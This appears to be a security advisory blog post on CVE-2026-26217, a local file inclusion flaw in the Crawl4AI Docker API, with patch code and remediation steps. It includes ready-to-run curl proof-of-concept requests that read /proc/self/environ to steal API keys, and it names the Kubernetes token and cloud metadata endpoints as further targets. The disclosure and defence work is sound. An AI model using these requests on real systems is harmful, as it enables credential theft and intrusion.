@app.post("/html") async def get_html(request: CrawlRequest): # ❌ FATAL ERROR: No validation of request.url # The browser blindly follows the file:// protocol await page.goto(request.url) content = await page.content() return {"html": content}

from urllib.parse import urlparse @app.post("/html") async def get_html(request: CrawlRequest): parsed = urlparse(request.url) # ✅ SECURITY FIX: Enforce HTTP/HTTPS if parsed.scheme not in ["http", "https"]: raise HTTPException(status_code=400, detail="Invalid protocol") await page.goto(request.url) content = await page.content() return {"html": content}

Exploiting this vulnerability is trivial and requires no authentication in the default Docker configuration. We can use standard curl commands to extract data. The most dangerous vector here isn't necessarily /etc/passwd—it's the environment variables.

Since this tool is built for AI workflows, it is highly likely that the container environment contains API keys for OpenAI, Anthropic, or AWS credentials.

Attack Step 1: Reconnaissance

We check if the server is vulnerable by trying to read the /etc/hostname file, which is present in almost every Docker container.

curl -X POST http://target:8080/html \
  -H "Content-Type: application/json" \
  -d '{"url": "file:///etc/hostname"}'

Attack Step 2: The Gold Mine

If the server responds with the hostname, we escalate immediately to /proc/self/environ. This file contains the environment variables for the current process, separated by null bytes.

curl -X POST http://target:8080/execute_js \
  -H "Content-Type: application/json" \
  -d '{
    "url": "file:///proc/self/environ",
    "scripts": ["document.body.innerText"]
  }'

The Output: Instead of a webpage, the attacker receives a JSON response containing strings like: OPENAI_API_KEY=sk-proj-12345...\u0000AWS_ACCESS_KEY_ID=AKIA...

With these keys, the attacker can pivot from the simple scraper container to the victim's cloud infrastructure or drain their AI credits.

Product

Affected Versions

Fixed Version

Crawl4AI

unclecode

< 0.8.0

0.8.0

Attribute

Detail

CWE ID

CWE-22 (Path Traversal)

CVSS v4.0

9.2 (Critical)

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N

Attack Vector

Network (API)

Exploit Status

PoC Available / Active

Impact

Information Disclosure (High)

GHSA-VX9W-5CX4-9796

9.20.06%

Crawl4AI: When Your Web Scraper Scrapes Your Server

Alon Barad

Software Engineer

Feb 17, 2026·6 min read·12 visits

PoC Available

Executive Summary (TL;DR)

Crawl4AI exposed a headless browser via API without validating URL schemas. Attackers can use `file:///etc/passwd` or `file:///proc/self/environ` to read server files and steal API keys. Fixed in version 0.8.0.

A critical Local File Inclusion (LFI) vulnerability in Crawl4AI's Docker API allows unauthenticated attackers to abuse the `file://` protocol. By leveraging the headless browser intended for web scraping, attackers can read arbitrary files from the host filesystem, including sensitive environment variables and credentials.

Attack Flow Diagram

The Hook: The Ouroboros of AI Scrapers

In the gold rush of 2025, everyone needed data to feed their hungry Large Language Models. Enter Crawl4AI, a nifty tool designed to turn the chaotic web into clean, LLM-ready JSON. It’s a developer favorite because it abstracts away the nightmare of managing headless browsers like Chromium. You spin up a Docker container, send it a URL, and it politely hands back the content. Simple, right?

But here is the problem with abstraction: it hides the monsters. When you deploy Crawl4AI's Docker API, you are essentially exposing a full-featured web browser to the internet. Browsers are designed to be helpful. They want to render images, execute JavaScript, and—if you ask nicely—open local files.

CVE-2026-26217 is what happens when you hand a loaded browser to the public internet without checking the safety. It turns out, if you asked Crawl4AI to "crawl" your own hard drive using the file:// protocol, it wouldn't just comply; it would take a screenshot, convert it to PDF, or extract the text and serve it up on a silver platter. It’s not just a bug; it’s an architectural oversight that turns a scraping tool into a file exfiltration cannon.

The Flaw: Browsers Are Too Trusting

The vulnerability lies in a classic failure of input validation, specifically regarding Uniform Resource Identifier (URI) schemes. The Crawl4AI API endpoints—/execute_js, /screenshot, /pdf, and /html—accept a JSON payload containing a url parameter. The application logic takes this string and passes it directly to the underlying browser automation library (likely Playwright or Puppeteer).

Under normal circumstances, a browser should be able to open local files. If you double-click an HTML file on your desktop, Chrome opens it. That's a feature. However, in a server-side context, this feature becomes a critical vulnerability known as Local File Inclusion (LFI) or Server-Side Request Forgery (SSRF) with local access.

> [!NOTE] > The Protocol Problem > The root cause isn't that the code was complex; it's that it was too simple. It lacked an allowlist. It implicitly trusted that the user would only provide http:// or https:// URLs.

By supplying a URI like file:///etc/passwd, the attacker instructs the headless browser to navigate to the local file system. Because the browser process (running inside the container) has read permissions for standard system files, it renders the file content just as it would render a webpage. The API then packages this content into the response, completing the exfiltration loop.

The Code: The Smoking Gun

Let's look at a reconstruction of the vulnerable logic versus the patched approach. The vulnerability exists because the URL is passed raw to the browser navigation method.

The Vulnerable Code (Conceptual)

In the vulnerable versions (< 0.8.0), the handler for the /html endpoint looked something like this:

@app.post("/html")
async def get_html(request: CrawlRequest):
    # ❌ FATAL ERROR: No validation of request.url
    # The browser blindly follows the file:// protocol
    await page.goto(request.url)
    content = await page.content()
    return {"html": content}

The Fix (Version 0.8.0)

The patch introduces a strict protocol check. Before the URL touches the browser, it must pass a schema validation check.

from urllib.parse import urlparse
 
@app.post("/html")
async def get_html(request: CrawlRequest):
    parsed = urlparse(request.url)
    
    # ✅ SECURITY FIX: Enforce HTTP/HTTPS
    if parsed.scheme not in ["http", "https"]:
        raise HTTPException(status_code=400, detail="Invalid protocol")
        
    await page.goto(request.url)
    content = await page.content()
    return {"html": content}

This simple check neutralizes the attack. If an attacker tries to pass file:///etc/shadow, the urlparse logic sees the scheme as file, the check fails, and the request is rejected before the browser is even invoked.

The Exploit: Stealing the Keys to the Kingdom

Since this tool is built for AI workflows, it is highly likely that the container environment contains API keys for OpenAI, Anthropic, or AWS credentials.

Attack Step 1: Reconnaissance

We check if the server is vulnerable by trying to read the /etc/hostname file, which is present in almost every Docker container.

curl -X POST http://target:8080/html \
  -H "Content-Type: application/json" \
  -d '{"url": "file:///etc/hostname"}'

Attack Step 2: The Gold Mine

If the server responds with the hostname, we escalate immediately to /proc/self/environ. This file contains the environment variables for the current process, separated by null bytes.

curl -X POST http://target:8080/execute_js \
  -H "Content-Type: application/json" \
  -d '{
    "url": "file:///proc/self/environ",
    "scripts": ["document.body.innerText"]
  }'

The Output: Instead of a webpage, the attacker receives a JSON response containing strings like: OPENAI_API_KEY=sk-proj-12345...\u0000AWS_ACCESS_KEY_ID=AKIA...

With these keys, the attacker can pivot from the simple scraper container to the victim's cloud infrastructure or drain their AI credits.

The Impact: Why This Matters

While CVSS 9.2 sounds high (and it is), the real impact depends on context. If Crawl4AI is running on a developer's laptop, the attacker reads their local files. If it's running in a Kubernetes cluster, the attacker reads the Service Account token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.

Key Consequences:

Credential Theft: As demonstrated, reading environment variables often leads to immediate compromise of third-party services.
Internal Network Scanning: While this report focuses on LFI, the ability to control the browser implies full SSRF. The attacker can direct the browser to http://localhost:80 or http://169.254.169.254 (cloud metadata services) to steal IAM roles.
Source Code Leakage: An attacker can map the directory structure and download the application's own source code, potentially finding hardcoded secrets or logic flaws.

This is a "game over" vulnerability for the confidentiality of the container and potentially the hosting infrastructure.

The Fix: Stopping the Bleeding

The remediation is straightforward, but urgency is required. The exploit is public, simple, and scriptable.

1. Update Immediately: Pull the latest Docker image. Version 0.8.0 and above contain the fix.

docker pull unclecode/crawl4ai:latest

2. Network Segmentation: Even with the patch, a scraping tool should never have unfettered access to internal networks. Ensure the container typically has no egress access to internal subnets (10.0.0.0/8, 192.168.0.0/16) and block access to cloud metadata IPs (169.254.169.254).

3. Run with Least Privilege: Do not run the container as root. While this doesn't stop the LFI of world-readable files, it prevents access to /etc/shadow or other root-owned sensitive data.

4. Authentication: The default Crawl4AI Docker setup does not enforce authentication. Put it behind a reverse proxy (Nginx, Traefik) that enforces Basic Auth or API key validation. Do not expose port 8080 to the public internet.

Official Patches

Crawl4AIRelease v0.8.0 containing the fix

Fix Analysis (1)

Technical Appendix

CVSS Score

9.2/ 10

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

EPSS Probability

0.06%

Top 81% most exploited

Affected Systems

Crawl4AI Docker APIHeadless Chromium/Playwright instances managed by Crawl4AI

Affected Versions Detail

Product	Affected Versions	Fixed Version
Crawl4AI unclecode	< 0.8.0	0.8.0

Attribute	Detail
CWE ID	CWE-22 (Path Traversal)
CVSS v4.0	9.2 (Critical)
CVSS Vector	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
Attack Vector	Network (API)
Exploit Status	PoC Available / Active
Impact	Information Disclosure (High)

MITRE ATT&CK Mapping

T1083File and Directory Discovery

Discovery

T1005Data from Local System

Collection

T1552Unsecured Credentials

Credential Access

CWE-22

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

Known Exploits & Detection

GitHub Security AdvisoryPublic disclosure and PoC details

VulnCheckAdvisory with curl examples

NucleiDetection Template Available

Vulnerability Timeline

Vulnerability discovered by researchers

2025-12-01

Vendor releases version 0.8.0 with fix

2026-01-12

Public disclosure and CVE assignment

2026-02-12